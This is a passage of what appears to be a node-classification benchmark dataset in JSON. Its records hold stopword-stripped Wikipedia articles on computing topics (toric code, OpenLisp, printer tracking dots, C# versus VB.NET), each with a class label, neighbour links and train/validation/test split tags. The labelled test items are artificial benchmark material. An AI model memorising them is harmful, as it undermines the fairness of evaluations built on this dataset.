similarity intuitive way visualizing semantic similarity terms grouping together terms closely related spacing wider apart ones distantly related also common practice mind maps concept maps sometimes subconscious direct way visualizing semantic similarity two linguistic items seen semantic folding approach approach linguistic item term text represented generating pixel active semantic features e.g 128 x 128 grid allows direct visual comparison semantics two items comparing image representations respective feature sets semantic similarity measures applied developed biomedical ontologies mainly used compare genes proteins based similarity functions rather sequence similarity also extended bioentities diseases comparisons done using tools freely available web similarity also applied find similar geographic features feature types several metrics use wordnet manually constructed lexical database english words despite advantages human supervision constructing database since words automatically learned database measure relatedness multi-word term non-incremental vocabulary natural language processing nlp field computer science linguistics sentiment analysis natural language understanding machine translation automatically translate text one human language another major areas used example knowing one information resource internet often immediate interest find similar resources semantic web provides semantic extensions find similar data content arbitrary descriptors essentially two types approaches calculate topological similarity ontological concepts measures calculate similarity ontological instances examples statistical similarity approaches learned data predefined similarity learning often outperform predefined similarity measures broadly speaking approaches build statistical model documents use estimate similarity researchers collected datasets similarity judgements pairs words used evaluate cognitive plausibility computational measures golden standard today old 65 word list humans judged word similarity list datasets overview state art see https //www.aclweb.org/",
    "neighbors": [
      416,
      2561,
      7780,
      7910,
      5197,
      2575,
      7599,
      9935,
      10577,
      10452,
      538,
      447
    ],
    "mask": "None"
  },
  {
    "node_id": 11207,
    "label": 9,
    "text": "Scicos:scicos scicos graphical dynamical system modeler simulator users create block diagrams model simulate dynamics hybrid dynamical systems continuous discrete time compile models executable code applications include signal processing systems control queuing systems study physical biological systems scilab includes toolbox called xcos based scicos scicos developed distributed scientific software package scicoslab scicos 4.4.1 released april 2011 book modeling simulation scilab/scicos scicoslab 4.4 campbell chancelier nikoukhah provides overview software",
    "neighbors": [
      9376,
      2691,
      4454,
      11239,
      587,
      6797,
      7983,
      8079,
      823,
      3960,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11208,
    "label": 1,
    "text": "RadRails:radrails radrails rapid application development ide ruby rails framework goal radrails provide ruby rails developers everything need develop manage test deploy applications features include source control code assist refactoring debugging webrick servers generator wizards syntax highlighting data tools much radrails ide built eclipse rcp includes rdt subclipse plug-in radrails tools also available eclipse +plug-ins eclipsecon 2006 radrails community award best open-source eclipse-based tool radrails started kyle shank marc baumbach matt kent september 2005 time three developers worked co-ops rochester institute technology ibm rational raleigh nc development continued 2006 including contributions andy gianfagna ryan lowe joined team mid-2006 deploy maintain automated build system project november 2006 kyle shank matt kent began working idea startup company would eventually become persai march 2007 kyle matt devoting spare time persai little time left maintain radrails kyle met aptana founder paul colton eclipsecon 2007 became clear handing project would best interests radrails community march 8 2007 aptana took project renamed aptana radrails although radrails still open source project work done aptana employee christopher williams lead developer rdt project radrails built upon radrails 1.0 released open source license march 13 2008 plug-in aptana studio eclipse-based ide web ajax development run either standalone within eclipse may 2008 book aptana radrails ide rails development written javier ramírez published packt publishing book covers features community edition 1.0",
    "neighbors": [
      7430,
      9229,
      2191,
      7695,
      10771,
      1687,
      9245,
      2465,
      9509,
      7983,
      564,
      4277,
      11446,
      5945,
      1852,
      5567,
      6338,
      5578,
      4171,
      6998,
      10973,
      2658,
      1379,
      11625,
      5612,
      2804,
      3583
    ],
    "mask": "None"
  },
  {
    "node_id": 11209,
    "label": 3,
    "text": "Toric_code:toric code toric code topological quantum error correcting code example stabilizer code defined two-dimensional spin lattice simplest well studied quantum double models also simplest example topological order— z topological order first studied context z spin liquid 1991 toric code also considered z lattice gauge theory particular limit introduced alexei kitaev toric code gets name periodic boundary conditions giving shape torus conditions give model translational invariance useful analytic study however experimental realization requires open boundary conditions allowing system embedded 2d surface resulting code typically known planar code identical behaviour toric code cases toric code defined two-dimensional lattice usually chosen square lattice spin-½ degree freedom located edge chosen periodic stabilizer operators defined spins around vertex formula_1 plaquette face formula_2 lattice follows formula_3 use formula_4 denote edges touching vertex formula_1 formula_6 denote edges surrounding plaquette formula_2 stabilizer space code stabilizers act trivially hence formula_8 state formula_9 toric code space four-dimensional used store two qubits quantum information proven considering number independent stabilizer operators occurrence errors move state stabilizer space resulting vertices plaquettes condition hold positions violations syndrome code used error correction unique nature topological codes toric code stabilizer violations interpreted quasiparticles specifically code state formula_10 formula_11 quasiparticle known formula_12 anyon said exist vertex formula_1 similarly violations formula_14 associated called formula_15 anyons plaquettes stabilizer space therefore corresponds anyonic vacuum single spin errors cause pairs anyons created transported around lattice errors create anyon pair move anyons one imagine path connecting two composed links acted upon anyons meet annihilated path describes loop loop topologically trivial effect stored information annihilation anyons case corrects errors involved creation transport however loop topologically non-trivial though re-annihilation anyons returns state stabilizer space also implements logical operation stored information errors case therefore corrected consolidated consider noise model bit phase errors occur independently spin probability p p low create sparsely distributed pairs anyons moved far point creation correction achieved identifying pairs anyons created equivalence class re-annihilating remove errors p increases however becomes ambiguous anyons may paired without risking formation topologically non-trivial loops gives threshold probability error correction almost certainly succeed mapping random-bond ising model critical probability found around 11 error models may also considered thresholds found cases studied far code found saturate hashing bound error models biased errors bit errors occur often phase errors vice versa lattices square lattice must used achieve optimal thresholds thresholds upper limits useless unless efficient algorithms found achieve well-used algorithm minimum weight perfect matching applied noise model independent bit flip errors threshold around 10.5 achieved falls little short 11 maximum however matching work well correlations bit phase errors depolarizing noise means perform quantum computation logical information stored within toric code considered properties code providing fault-tolerance shown extending stabilizer space using 'holes vertices plaquettes stabilizers enforced allows many qubits encoded code however universal set unitary gates fault-tolerantly implemented unitary operations additional techniques required achieve quantum computing example universal quantum computing achieved preparing magic states via encoded quantum stubs called tidbits used teleport required additional gates replaced qubit furthermore preparation magic states must fault tolerant achieved magic state distillation noisy magic states measurement based scheme quantum computation based upon principle found whose error threshold highest known two-dimensional architecture since stabilizer operators toric code quasilocal acting spins located near two-dimensional lattice unrealistic define following hamiltonian formula_16 ground state space hamiltonian stabilizer space code excited states correspond anyons energy proportional number local errors therefore energetically suppressed gap shown stable local perturbations however dynamic effects perturbations still cause problems code gap also gives code certain resilience thermal errors allowing correctable almost surely certain critical time time increases formula_17 since arbitrary increases coupling unrealistic protection given hamiltonian still limits means make toric code planar code fully self-correcting quantum memory often considered self-correction means hamiltonian naturally suppress errors indefinitely leading lifetime diverges thermodynamic limit found possible toric code long range interactions present anyons proposals made realization lab another approach generalization model higher dimensions self-correction possible 4d quasi-local interactions mentioned called formula_12 formula_15 quasiparticles associated vertices plaquettes model respectively quasiparticles described anyons due non-trivial effect braiding specifically though species anyons bosonic respect braiding two formula_12 formula_15 effect full monodromy formula_12 formula_15 yield phase formula_24 result consistent either bosonic fermionic statistics hence anyonic anyonic mutual statistics quasiparticles demonstrate logical operations performed topologically non-trivial loops consider creation pair formula_12 anyons followed transport one around topologically nontrivial loop shown torus blue figure pair reannhilated state returned stabilizer space loop implements logical operation one stored qubits formula_15 anyons similarly moved red loop logical operation also result phase formula_24 resulting braiding anyons shows operations commute rather anticommute may therefore interpreted logical formula_28 formula_29 pauli operators one stored qubits corresponding logical pauli qubit correspond formula_15 anyon following blue loop formula_12 anyon following red braiding occurs formula_12 formula_15 pass parallel paths phase formula_24 therefore arise corresponding logical operations commute expected since form operations acting different qubits due fact formula_12 formula_15 anyons created pairs clear see quasiparticles antiparticles composite particle composed two formula_12 anyons therefore equivalent vacuum since vacuum yield pair pair annihilate vacuum accordingly composites bosonic statistics since braiding always completely trivial composite two formula_15 anyons similarly equivalent vacuum creation composites known fusion anyons results written terms fusion rules case take form formula_39 formula_40 denotes vacuum composite formula_12 formula_15 trivial therefore constitutes another quasiparticle model sometimes denoted formula_43 fusion rule formula_44 braiding statistics anyons see since single exchange two formula_43 involve full monodromy constituent formula_12 formula_15 phase formula_24 result implies fermionic self-statistics formula_43 use torus required form error correcting code surfaces may also used topological properties determining degeneracy stabilizer space general quantum error correcting codes defined two-dimensional spin lattices according principles known surface codes also possible define similar codes using higher-dimensional spins quantum double models string-net models allow greater richness behaviour anyons may used advanced quantum computation error correction proposals include models abelian anyons also non-abelian statistics explicit demonstration properties toric code state based approaches rather attempting realize hamiltonian simply prepare code stabilizer space using technique experiments able demonstrate creation transport statistics anyons recent experiments also able demonstrate error correction properties code realizations toric code generalizations hamiltonian much progress made using josephson junctions theory hamiltonians may implemented developed wide class topological codes experiment also performed realizing toric code hamiltonian small lattice demonstrating quantum memory provided degenerate ground state theoretical experimental works towards realizations based cold atoms toolkit methods may used realize topological codes optical lattices explored",
    "neighbors": [
      2680,
      9801,
      2781
    ],
    "mask": "Test"
  },
  {
    "node_id": 11210,
    "label": 5,
    "text": "Type-length-value:type-length-value within data communication protocols tlv type-length-value tag-length-value encoding scheme used optional information element certain protocol type length fixed size typically 1-4 bytes value field variable size fields used follows advantages using tlv representation data system solution imagine message make telephone call first version system might use two message elements command phonenumbertocall codice_1 codice_2 codice_3 integer constants 4 8 lengths value fields respectively later version 2 new field containing calling number could added version 1 system received message version 2 system would first read codice_1 element read element type codice_5 version 1 system understand codice_5 length field read i.e 14 system skips forward 14 bytes read understands message parsing carries example usage link layer discovery protocol allows sending organizational-specific information tlv element within lldp packets another example rr protocol used gsm cell phones defined 3gpp 04.18 rr protocol message defined sequence information elements many protocols use tlvs cops is-is radius core tcp/ip protocols particularly ip tcp udp use predefined static fields common tcp/ip-based protocols http ftp smtp pop3 sip use text-based field value pairs formatted according rfc 2822 asn.1 specifies several tlv-based encoding rules ber der well non-tlv based ones per xer csn.1 describes encoding rules using non-tlv semantics recently xml used implement messaging different nodes network messages typically prefixed line-based text commands beep",
    "neighbors": [
      5472,
      7361,
      7364,
      3751,
      904,
      10058,
      172,
      10924,
      432,
      6577,
      4723,
      9909,
      11413,
      11321,
      10271,
      4797,
      2206,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 11211,
    "label": 4,
    "text": "Cure53:cure53 cure53 german cybersecurity firm company found dr.ing mario heidrich client side security researcher report firm south korean security app smart sheriff described security holes catastrophic south korean government ordered app shut",
    "neighbors": [
      3590,
      11399,
      8172,
      5813,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 11212,
    "label": 9,
    "text": "Comparison_of_C_Sharp_and_Visual_Basic_.NET:comparison c sharp visual basic .net c visual basic .net two primary languages used program .net framework c vb.net syntactically different languages different histories name suggests c syntax based core c programming language originally developed dennis ritchie bell labs 1970s java c++ two programming languages whose syntax also based c syntax share common look feel see comparison java c sharp topic basic roots go back dartmouth college basic beginner all-purpose symbolic instruction code developed 60 method overcome difficulties using assembly language written processor specific and/or brand name specific main frames hardware may recall programming hardware dependent design marketing reasons preserve logical composition programming transcend hardware microsoft claim fame operating system free consumers hardware specific devices encapsulating task within operating system code became portable due compiler fact visual basic .net c use clr common language runtime today microsoft hp interested creating iso standard language original goal however hp dropped support iso computer language never materialized international standard vb.net roots basic language '60s name acronym beginner all-purpose symbolic instruction code beginning basic used college community basic language first exposure computer programming acronym represented language accurately '70s language picked microcomputer manufacturers era used simple rom embedded programming language well quasi operating system input/output control early '80s language picked microsoft expanded significantly beyond original intent visual basic language/platform sold throughout 1990s rapid application development rad tool windows programming competed directly rad tools 1990s powerbuilder even though visual basic successful development platform discontinued 6th version vb6 microsoft introduced .net framework related visual studio development platform early 2000s time current c++ vb6 languages used microsoft basis two new programming languages new integrated development environment ide languages named c vb.net february 2017 microsoft communicated intent end co-evolution strategy two languages existed since 2010 allow two languages evolve independently c dominant microsoft-based development language developers notice vb 15 first appearing visual studio 2017 lacks certain language capabilities contained new c 7.3 though c vb.net syntactically different differences mostly end microsoft developed languages part .net framework development platform developed managed supported language development team microsoft compile intermediate language il runs .net framework runtime libraries although differences programming constructs discussed differences primarily syntactic assuming one avoids visual basic compatibility libraries provided microsoft aid conversion vb6 almost every command vb equivalent command c vice versa lastly languages reference base classes .net framework extend functionality result exceptions program written either language run simple syntax converter translate many open source commercially available products task fundamental differences languages found implementation interfaces declaration raising handling events although languages high-level programming languages vb.net maintains slightly higher level abstraction respects one main goals .net multi-language support intent design various microsoft languages level access os features able expose level power usability simplify calling module one language written another language implementation .net programming languages share runtime engine uniform abstract syntax tree common intermediate language additionally .net languages access platform features including garbage collection cross language inheritance exception handling debugging allows output binary produced .net programming language visual studio provides minor differences development environment c vb.net subsequent release visual studio differences development environments languages reduced instance early versions visual studio poor support intellisense c compared visual basic .net offer background compilation c currently main differences development environments additional features visual basic .net originated vb6 including background compilation feature visual studio ide whereby code compiled written programmer purpose identifying compilation errors without requiring solution built feature available visual basic since .net 1.1 present early versions visual studio visual basic .net however background compilation relatively new concept visual c available service pack 1 visual studio 2008 standard edition distinct disadvantage c error list panel update solution rebuilt refactoring large projects c made difficult need frequently rebuild solution order highlight compilation errors case visual basic error list panel synchronized background compiler background compilation less demanding system resources results faster build cycles particular advantage large projects significantly reduce time required start debugging ide bulk differences c vb.net technical perspective syntactic sugar features languages things easier one language another many differences two languages actually centered around ide although default codice_53 backward compatibility reasons recommended microsoft widely considered good practice turn codice_53 due fact increases application performance reduces possibility naming errors programming mistakes visual basic .net terminates block code codice_59 statements codice_60 statements loop familiar programmers experience using t-sql c braces codice_61 used delimit blocks familiar programmers experience widely deployed languages c++ java additionally c block consists single statement braces may omitted c case sensitive visual basic .net thus c possible two variables apparent name example codice_62 codice_63 visual studio correct make uniform case variables typed vb.net cases however case sensitivity useful c programmers typically capitalize type member names leave field variable names lowercase allows example fairly natural naming method arguments codice_64 however cause problems converting c code case-insensitive language visual basic unaccustomed reading case sensitive language visual basic case sensitive means combinations upper lower case letters keywords acceptable visual studio automatically converts visual basic keywords default capitalised forms e.g public c case sensitive c keywords lower cases visual basic c share keywords difference default visual basic keywords capitalised versions c keywords e.g codice_65 vs codice_66 codice_18 vs codice_68 keywords different versions visual basic c c keywords codice_80 represent different things applied methods opposed applied class definitions vb.net hand uses different keywords different contexts c vb.net high adoption rates active developer communities microsoft fully supports communities .net framework developers widely use vb.net c primary languages however c community activity internet books available c may indicate either adoption c users need help examples community industry adoption include c++/cli replacement managed extensions c++ adoption rate c vb.net significant following c++/cli syntactically stylistically culturally closest c however c++/cli stays closer c++ roots c c++/cli directly supports pointers destructors unsafe program concepts supported limited languages allows direct use .net code standard c++ code c++/cli used porting native/legacy c++ applications .net framework cases programmer wants take control code control comes significant cost ease use readability many automated tools come visual studio reduced functionality interacting c++ code reflection provide much information code c vb.net j runs distant fourth terms adoption j language primarily designed ease transition java applications .net framework allows developers leave much java j++ code unchanged still running .net framework thus allowing migrate small pieces another .net language c individually j receive level updates languages level community support example visual studio 2005 team system supports automatic generation unit tests c vb.net c++ excludes j j discontinued included visual studio 2008 newer versions since existing j feature set largely meets customer needs usage j declining .net languages compile common intermediate language cil contains rich metadata functionally logically equivalent original .net language code reasons possible code directly cil rarely done equivalency cil .net language code permits tools .net reflector transform .net assembly source code nearly identical original source code obfuscators often used guard operate directly modifying cil assembly order make difficult impossible de-compile higher level .net language",
    "neighbors": [
      1931,
      6411,
      6414,
      10510,
      6160,
      5521,
      3350,
      3736,
      155,
      10145,
      5796,
      11559,
      5677,
      5806,
      7983,
      9008,
      3765,
      7479,
      10043,
      10684,
      1856,
      5952,
      963,
      10435,
      5961,
      1610,
      1611,
      9804,
      3577,
      8397,
      11219,
      5588,
      7894,
      4057,
      10586,
      4572,
      11617,
      4069,
      7274,
      8171,
      6640,
      9330,
      3573,
      1016,
      3705,
      2045
    ],
    "mask": "Train"
  },
  {
    "node_id": 11213,
    "label": 4,
    "text": "High-Tech_Bridge:high-tech bridge high-tech bridge sa web security company based geneva switzerland develops machine learning artificial intelligence technologies application security via ast platform immuniweb ai started december 2007 vendor-neutral penetration testing boutique high-tech bridge named industry leader best service provider among ethical hacking penetration testing companies frost sullivan market research 2012 high-tech bridge founded ilia kolochenko swiss application security expert sc media thought leader forbes technology council member contributing editor sc magazine uk dark reading idg cso online november 2013 international telecommunication union high-tech bridge agreed use immuniweb part itu toolset ensuring websites itu member states secure july 2015 high-tech bridge pricewaterhousecoopers switzerland announced strategic partnership based around immuniweb web penetration testing continuous monitoring vulnerability assessment capabilities partnership afterward expanded pwc global offices including pwc singapore high-tech bridge security research team released 500 security advisories affecting various software issues identified products many well-known vendors sony mcafee novell addition many web vulnerabilities affecting popular open source commercial web applications oscommerce zen cart microsoft sharepoint sugarcrm others high-tech bridge security research lab registered cve cwe compatible mitre high-tech bridge one 24 organizations globally first switzerland able achieve cwe certification company listed among 81 organizations august 2013 include cve identifiers security advisories high-tech bridge launched ssl/tls configuration testing tool october 2015 tool validates email web tls ssl server configuration nist guidelines checks pci dss compliance cited articles covering talktalk data breach discovery vulnerabilities yahoo sites high-tech bridge widely reported leading t-shirt gate affair changes yahoo bug bounty program high-tech bridge identified reported four xss vulnerabilities yahoo domains company awarded two gift vouchers value 25 sparse reward offered security researchers identifying vulnerabilities yahoo criticized sparking came called t-shirt-gate campaign yahoo sending t-shirts thanks discovering vulnerabilities high-tech bridge discovery vulnerabilities subsequent criticism yahoo reward program led yahoo rolling new vulnerability reporting policy offers 150 15,000 reported issues based pre-established criteria december 2013 high-tech bridge research privacy popular social networks email services cited class action lawsuit allegedly violating members privacy scanning private messages sent social network october 2014 high-tech bridge discovered remote code execution vulnerabilities php december 2014 high-tech bridge identified ransomweb attack development ransomware attacks hackers started taking webs servers encrypting data demanding payment unlock files april 2014 discovery sophisticated drive-by download attacks revealed drive-by download attacks used target specific website visitors authentication compromised web resource december 2015 high-tech bridge tested popular free email service providers ssl/tls email encryption hushmail previously considered one secure email providers received failing f grade company updated ssl configuration received score b+ march 2015 immuniweb recognized frost sullivan 2015 market insight 'the complete hybrid offering available april 2016 high-tech bridge selected red herring europe 2016 winner sc media reboot 2016 named immuniweb industry innovator analysis testing category april 2017 frost sullivan research machine learning application security testing ast recognized high-tech bridge innovative player ast marketplace outperforming hpe ibm security may 2017 gartner named high-tech bridge garter cool vendor cool vendors security midsize enterprises 2017 adam hils june 2017 high-tech bridge selected sc awards europe 2017 winner best emerging technology category june 2018 immuniweb named winner “ best usage machine learning ai ” category sc awards europe 2018 outperforming six finalists including ibm watson cybersecurity high-tech bridge member number security-related organizations including",
    "neighbors": [
      3555,
      8644,
      1638,
      711,
      7228,
      1970,
      11476,
      2709,
      6423,
      5404,
      4062,
      8735
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11214,
    "label": 4,
    "text": "Ticket_punch:ticket punch ticket punch control nippers hand tool permanently marking admission tickets similar items paper card stock makes perforation corresponding chad ticket punch resembles hole punch differing ticket punch longer jaw reach option distinctive die shape ticket punch resembles needle punch makes distinctive pattern item punched differs makes chad ticket punches widely used mark railway passenger tickets particularly important ticket punched ticket punches also widely used orienteering replaced needle punches see control point orienteering ticket punches also decorative uses involving perforations chads available die shapes include many geometric shapes silhouettes objects animals die shapes company logos proprietary images manufactured special arrangement used punch decorative holes margins pieces paper make small confetti punched tickets issued best buses mumbai till 2011 replaced electronic ticketing systems older tickets reportedly used artwork well games",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 11215,
    "label": 4,
    "text": "Machine_Identification_Code:machine identification code machine identification code mic also known printer steganography yellow dots tracking dots secret dots digital watermark certain color laser printers copiers leave every single printed page allowing identification device document printed giving clues originator developed xerox canon mid-1980s existence became public 2004 2018 scientists developed privacy software anonymize prints order support whistleblowers publishing work mid-1980s xerox pioneered encoding mechanism unique number represented tiny dots spread entire print area xerox developed machine identification code assuage fears color copiers could used counterfeit bills received u.s. patent 5515451 describing use yellow dots identify source copied printed document october 2004 consumers first heard hidden feature used dutch authorities track counterfeiters used canon color laser printer november 2004 pc world broke news machine identification code used decades printers allowing law enforcement identify track counterfeiters central bank counterfeit deterrence group cbcdg denied developed feature 2005 civil rights group electronic frontier foundation eff encouraged public send sample printouts subsequently decoded pattern pattern demonstrated wide range printers different manufacturers models eff stated 2015 documents previously received foia suggested major manufacturers color laser printers entered secret agreement governments ensure output printers forensically traceable 2007 european parliament asked question invasion privacy pattern consists dot-matrix spread yellow dots barely seen naked eye dots diameter tenth millimeter 0.004 spacing one millimeter 0.039 arrangement encodes serial number device date time printing repeated several times across printing area case errors example code consists 8 × 16 dots square hexagonal pattern spreads surface appears sheet size din-a4 paper 150 times thus analyzed even fragments excerpts available printers arrange yellow dots seemingly random point clouds according chaos computer club 2005 color printers leave code matrix 32 × 16 dots thus store 64 bytes data 64×8 xerox one manufacturers draw attention marked pages stating product description digital color printing system equipped anti-counterfeit identification banknote recognition system according requirements numerous governments copy shall marked label necessary allows identification printing system created code visible normal conditions 2018 scientists tu dresden analyzed patterns 106 printer models 18 manufacturers found four different encoding schemes machine identification code made visible printing copying page subsequently scanning small section high-resolution scanner yellow color channel enhanced image processing program make dots mic clearly visible good lighting conditions magnifying glass may enough see pattern uv-light yellow dots clearly recognizable using steganographic process high-quality copies original e.g bank note blue light made identifiable using process even shredded prints restored 2011 shredder challenge initiated darpa solved team called shreds belong u.s. consisting otavio good two colleagues copies printouts documents confidential personal information example health care information account statements tax declaration balance sheets traced owner printer creation date documents revealed traceability unknown many users inaccessible manufacturers publicize code produces patterns unclear data may unintentionally passed copy printout particular mentions technique support materials affected printers exceptions see 2005 electronic frontier foundation eff sought decoding method made available python script analysis 2018 scientists tu dresden developed published tool extract analyze steganographic codes given color printer subsequently anonymize prints printer anonymization works printing additional yellow dots top machine identification code scientists made software available order support whistleblowers efforts publicize grievances methods identification easily recognizable yellow dots example modulation laser intensity variation shades grey texts already feasible unknown whether manufacturers using techniques",
    "neighbors": [
      10976,
      4617,
      8329,
      8554,
      11221
    ],
    "mask": "Test"
  },
  {
    "node_id": 11216,
    "label": 3,
    "text": "Edholm's_law:edholm law edholm law named phil edholm says three categories communication namely wireless mobile nomadic wireless without mobility wired network fixed lockstep converge edholm law also holds data rates telecommunications categories increase similar exponential curves slower rates trailing faster ones predictable time lag soon even slower communications channels like cellphones radio modems eclipse capacity early ethernet due developments standards known umts mimo boost bandwidth maximizing antenna usage extrapolating forward indicates convergence rates nomadic wireless technologies around 2030 addition wireless technology could end wireline communication cost latter infrastructure remains high edholm law predicted required data rates double every 18 months proven true last decade trend evident 16 years cases cellular wireless lan wireless personal area networks",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 11217,
    "label": 5,
    "text": "Synchronous_transmit-receive:synchronous transmit-receive synchronous transmit-receive str early ibm character-oriented communications protocol preceded bisync str point-to-point employed four-of-eight transmission code communicating 5100 characters per second half-duplex full-duplex communication lines ibm 1009 data transmission unit ibm 1130 synchronous communications adapter ibm system/360 model 20 communications adapter ibm 2701 data transmission unit provided host computer support str ibm 7701 ibm 7702 magnetic tape transmission terminal ibm 1013 card transmission terminal ibm 7710 ibm 7711 data communication units among remote devices supported str str still supported 1972 although generally faded use four-of-eight code 64 character set plus six control characters encoded eight bits exactly four bits character one bits — 70 possible bit combinations four-of-eight code first column graphics 7701 graphic shown code unassigned plus zero minus zero distinct values many machines shown +0 -0 second column graphics 1130 sca graphics shown different 7701 mostly characters ebcdic character set present bcd synchronous transmit-receive control codes control characters reserved provision transparent operation longitudinal redundancy check byte character could four one bits byte contains zero bit position data record contained even number one bits one odd number idle characters control sequences included lrs data transmitted line maintained synchronize mode — terminal transmits idle characters approximately 1.3 seconds followed end-of-idle sequence codice_1 listens sequence approximately three seconds four wire operation data transmitted wire pair maintained synchronize mode least one idle character sent transmission ownership line established transmitting station sending inquiry sequence codice_2 receiving terminal responds acknowledge codice_3 following initiation sequence transmitting terminal sends codice_4 followed first block data data terminated end-of-transmittal-record codice_5 receiving terminal replies codice_6 codice_7 longitudinal redundancy check indicates transmission error process continues even/odd codice_8 codice_9 sending terminal transmitted data sends end-of-transmission sequence codice_10 receiving terminal responds codice_10 re-enters synchronize mode",
    "neighbors": [
      8138,
      4938,
      10508,
      1997,
      3443,
      3323
    ],
    "mask": "None"
  },
  {
    "node_id": 11218,
    "label": 9,
    "text": "OpenLisp:openlisp openlisp programming language lisp family developed christian jullien conforms international standard islisp published jointly international organization standardization iso international electrotechnical commission iec iso/iec 13816:1997 e revised iso/iec 13816:2007 e written programming languages c lisp runs common operating systems openlisp designated islisp implementation also contains many common lisp-compatible extensions hashtable readtable package defstruct sequences rational numbers libraries network socket regular expression xml portable operating system interface posix sql lightweight directory access protocol ldap openlisp includes interpreter associated read–eval–print loop repl lisp assembly program lap backend compiler language c. main goal lisp version implement fully compliant islisp system launched codice_1 flag strictly restricted iso/iec 13816:2007 e specification secondary goal provide complete embeddable lisp system linkable c/c++ java via java native interface jni callback mechanism used communicate external program goals usable scripting language glue language produce standalone program executables despite name openlisp proprietary software interpreter available free charge noncommercial use openlisp mainly runs console mode codice_2 microsoft windows terminal emulator unix-based systems alternate solutions include running openlisp emacs via setting emacs codice_3 using integrated development environment ide supports openlisp syntax lispide daansystems natively internally openlisp uses virtual memory allocate extend objects automatically small objects type allocated using bibop big bag pages memory organization large objects use proxy point real object lisp heap conservative garbage collection mark sweep coalescing heap sweep phase configured use threads openlisp uses tagged architecture 4 bits tag 32-bit 5 bits tag 64-bit fast type checking small integer float symbol cons string vector small integers 28 bits 32-bit 59 bits 64-bit unboxed large 32/64-bit integers boxed required islisp arbitrary-precision arithmetic bignums also implemented characters hence strings either 8-bit ansi ebcdic 16/32-bit unicode support enabled lisp kernel native interpreter basic libraries hand coded language c lap intermediate language produced compiler translated c c backend code generator 1988 first motive behind openlisp implement lisp subset extend emact emacs clone islisp became obvious choice quickly development ensued openlisp claims extremely portable runs many operating systems including windows unix posix based linux macos freebsd openbsd netbsd solaris hp-ux aix cygwin qnx dos os/2 pocket pc openvms z/os official website download section contains 50 different versions openlisp interact modules written c using foreign function interface ffi islisp streams extended support network socket codice_4 directory includes samples hypertext transfer protocol http javascript object notation json post office protocol 3 pop3 simple mail transfer protocol smtp telnet rss simplified extensible markup language xml reader convert xml lisp basic sql module used mysql odbc sqlite postgresql comma-separated values csv module read write csv files developer tools include data logging pretty-printer profiler design contract programming unit tests well known algorithms available codice_5 directory dantzig simplex algorithm dijkstra algorithm ford–fulkerson algorithm modules shipped using bsd licenses prefix open refers open systems open-source model name chosen 1993 replace mlisp internal code name already used gosling emacs successor mocklisp openlisp programming language different openlisp project begun 1997 implement locator/identifier separation protocol section describes compiler transforms lisp code c. fibonacci number function classic definition used benchmarks efficient way compute codice_6 lisp compiler translates lisp source code following intermediate code followed peephole optimization pass uses intermediate format analyze optimize instructions optimization final lap code finally c code generator uses lap code translate instructions c. static pointer oldefcompiled1 olfib_00 p1 _l003 _l004 openlisp accepts lines unlimited length recommended style line text code 80 characters per line chosen sdf public access unix system nonprofit public access unix systems internet one programming languages available online bricsys uses openlisp implement autolisp bricscad computer-aided design cad system meva entirely written openlisp università degli studi di palermo uses openlisp teach lisp",
    "neighbors": [
      10752,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      8226,
      5677,
      3119,
      9780,
      2105,
      3132,
      6717,
      7234,
      8258,
      8771,
      3142,
      8262,
      1613,
      9299,
      10841,
      3675,
      7267,
      2660,
      8293,
      9320,
      2666,
      5751,
      2168,
      7805,
      9345,
      1159,
      9865,
      6797,
      9871,
      9877,
      5803,
      10413,
      2225,
      9909,
      6840,
      7867,
      4797,
      4799,
      7880,
      8908,
      205,
      5837,
      5852,
      10463,
      7392,
      7904,
      11488,
      11495,
      5356,
      9964,
      4846,
      5360,
      5361,
      8944,
      8435,
      2804,
      9969,
      9975,
      6906,
      2304,
      4865,
      4867,
      3334,
      6919,
      3336,
      3856,
      11539,
      1301,
      791,
      1304,
      10012,
      3869,
      2335,
      2849,
      7981,
      7983,
      2352,
      10547,
      823,
      311,
      6969,
      3408,
      6994,
      1365,
      2392,
      8539,
      10083,
      6502,
      11112,
      11625,
      7022,
      3443,
      5492,
      3446,
      1399,
      9080,
      377,
      10104,
      5501,
      4992,
      7562,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      5546,
      9128,
      7616,
      5569,
      6594,
      4550,
      10703,
      11219,
      10712,
      3034,
      7134,
      479,
      3051,
      5611,
      4589,
      9714,
      499,
      7670,
      11255,
      6651,
      8700,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 11219,
    "label": 9,
    "text": "Comparison_of_programming_languages:comparison programming languages programming languages used controlling behavior machine often computer like natural languages programming languages conform rules syntax semantics thousands programming languages new ones created every year languages ever become sufficiently popular used people professional programmers may use dozens languages career programming languages standardized international national standard even widely used ones perl standard ml despite name notable standardized programming languages include algol c c++ javascript name ecmascript smalltalk prolog common lisp scheme ieee standard ada fortran cobol sql xquery following table compares general technical information selection commonly used programming languages see individual languages articles information please note following table may missing information programming languages print error message throw exception input/output operation system call e.g. chmod kill fails unless programmer explicitly arranged different handling events thus languages fail safely regard mostly older languages require programmer explicitly add checks kinds errors psychologically different cognitive biases e.g. optimism bias may affect novice experts alike omissions lead erroneous behavior literature programming languages contains abundance informal claims relative expressive power framework formalizing statements deriving interesting consequences table provides two measures expressiveness two different sources additional measure expressiveness gzip bytes found computer language benchmarks game benchmarks designed mimic particular type workload component system computer programs used compiling benchmark data section may fully optimized relevance data disputed accurate benchmarks customized particular situation people benchmark data may value others proper interpretation brings many challenges computer language benchmarks game site warns over-generalizing benchmark data contains large number micro-benchmarks reader-contributed code snippets interface generates various charts tables comparing specific programming languages types tests",
    "neighbors": [
      512,
      10752,
      6147,
      9224,
      2062,
      6160,
      5658,
      9245,
      8225,
      2605,
      5165,
      5677,
      5168,
      1591,
      2617,
      6718,
      10819,
      8262,
      1610,
      1611,
      9804,
      6228,
      10345,
      1130,
      2666,
      7274,
      2670,
      623,
      6775,
      3705,
      7292,
      9345,
      2691,
      9875,
      10387,
      8854,
      3736,
      155,
      3229,
      7326,
      5796,
      4777,
      7341,
      5806,
      7343,
      10413,
      1203,
      692,
      3765,
      5830,
      5833,
      8397,
      7889,
      2774,
      7894,
      5336,
      228,
      8421,
      10470,
